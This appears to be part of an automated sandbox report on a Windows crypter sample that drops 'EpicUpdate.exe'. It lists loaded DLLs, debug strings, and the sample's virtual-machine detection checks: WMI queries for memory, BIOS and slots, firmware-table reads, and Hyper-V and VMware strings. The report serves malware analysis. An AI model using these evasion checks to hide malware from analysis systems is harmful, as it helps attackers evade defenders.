Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: perfos.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: redlizard.pdbj source: EpicUpdate.exe, 00000002.00000003.32268595883.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: redlizard.pdb source: EpicUpdate.exe, 00000002.00000003.32268595883.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp

Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Static PE information: section name: .voltbl
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

File created: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PortConnector
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_PhysicalConnector
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Slot

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe TID: 2592	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe TID: 2504	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisorl"
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual Webcam
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31836845768.000001ECC2863000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31836514521.000001ECC2855000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processormui}
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual WebcamGoogle Camera AdapterIP Camera [JPEG/MJPEG]CyberLink Webcam SplitterEpocCamp3
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2F83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2F83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2E84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X2Hyper-V VM Vid Partition
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2F83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2E84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partitionl
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisors
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partition
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Inc.
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31830411647.000001ECC2811000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rkflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Inte
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Gearway Electronics (Dong Guan) Co., Ltd.VMware Inc.Olimex Ltd.
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus/
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2F83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2E84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processorc.sys_
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition\|
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service3
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2F83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2E84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisoraf
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes.
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31836514521.000001ECC28A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count SnapshotreadWW:M
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2F83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 00000003.00000002.32725292827.00000275340EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllooB
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31892912851.000001ECC2FFC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31856570034.000001ECC2F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipesd
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Fusion 4 has corrupt rendering on Windows
